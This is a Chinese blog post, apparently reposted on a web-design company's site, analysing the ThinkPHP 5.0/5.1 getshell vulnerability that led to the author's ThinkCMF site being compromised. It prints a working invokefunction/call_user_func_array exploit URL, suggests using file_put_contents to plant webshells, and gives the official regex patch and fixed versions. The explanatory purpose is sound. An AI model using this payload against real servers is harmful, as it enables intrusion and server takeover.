thinkphp5.0和5.1的getshell漏洞示例分析-創(chuàng)新互聯(lián)

這篇文章將為大家詳細(xì)講解有關(guān)thinkphp5.0和5.1的getshell漏洞示例分析,小編覺得挺實(shí)用的,因此分享給大家做個參考,希望大家閱讀完這篇文章后可以有所收獲。

大廠網(wǎng)站建設(shè)公司創(chuàng)新互聯(lián)建站,大廠網(wǎng)站設(shè)計(jì)制作,有大型網(wǎng)站制作公司豐富經(jīng)驗(yàn)。已為大廠千余家提供企業(yè)網(wǎng)站建設(shè)服務(wù)。企業(yè)網(wǎng)站搭建\成都外貿(mào)網(wǎng)站建設(shè)要多少錢,請找那個售后服務(wù)好的大廠做網(wǎng)站的公司定做!

之前網(wǎng)站被提權(quán)了,那時候網(wǎng)站才建沒幾天,應(yīng)該不會有人故意為之,可能是批量掃描getshell的,為了方便我找的是開源系統(tǒng)thinkcmf建了博客,看著挺不錯的,因?yàn)閠hinkcmf用的是thinkphp5.0的框架開發(fā)的,我到thinkphp.cn上去看了一下,原來有一個提權(quán)漏洞。

libaray/think/app.php文件中模塊,控制器,方法使用的是/來區(qū)分開來。

然后并沒有對控制器進(jìn)行過濾,導(dǎo)致可以構(gòu)造執(zhí)行各種函數(shù)

thinkphp5.0和5.1的getshell漏洞示例分析

thinkphp5.0和5.1的getshell漏洞示例分析

thinkphp5.0和5.1的getshell漏洞示例分析

thinkphp5.0和5.1的getshell漏洞示例分析

我在本地建一個虛擬主機(jī)測試http://cmf.com

構(gòu)造一個url訪問,可以直接打印出phpinfo:

http://cmf.com/index.php?s=portal/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

thinkphp5.0和5.1的getshell漏洞示例分析

然后你可以把phpinfo換成其他函數(shù),比如使用file_put_content函數(shù)創(chuàng)建各種大馬小馬文件。

TP官方的修復(fù)5.0方法是:

think\App類的module方法的獲取控制器的代碼后面加上

if (!preg_match('/^[A-Za-z](\w|\.)*$/', $controller)) {
    throw new HttpException(404, 'controller not exists:' . $controller);
}

我用的thinkcmf的版本是:ThinkCMF 5.0.180901

然后我看了一下thinkcmf的官網(wǎng)已經(jīng)更新到5.0.190111,新版也更新了tp5.0到新版本5.0.24了包含了安全更新,當(dāng)然也沒有這個提權(quán)漏洞了。

關(guān)于“thinkphp5.0和5.1的getshell漏洞示例分析”這篇文章就分享到這里了,希望以上內(nèi)容可以對大家有一定的幫助,使各位可以學(xué)到更多知識,如果覺得文章不錯,請把它分享出去讓更多的人看到。

網(wǎng)站名稱:thinkphp5.0和5.1的getshell漏洞示例分析-創(chuàng)新互聯(lián)
文章位置:http://muchs.cn/article6/dsehig.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián),為您提供網(wǎng)站營銷面包屑導(dǎo)航、外貿(mào)建站、云服務(wù)器、動態(tài)網(wǎng)站、搜索引擎優(yōu)化

廣告

聲明:本網(wǎng)站發(fā)布的內(nèi)容(圖片、視頻和文字)以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主,如果涉及侵權(quán)請盡快告知,我們將會在第一時間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場,如需處理請聯(lián)系客服。電話:028-86922220;郵箱:631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載,或轉(zhuǎn)載時需注明來源: 創(chuàng)新互聯(lián)

外貿(mào)網(wǎng)站制作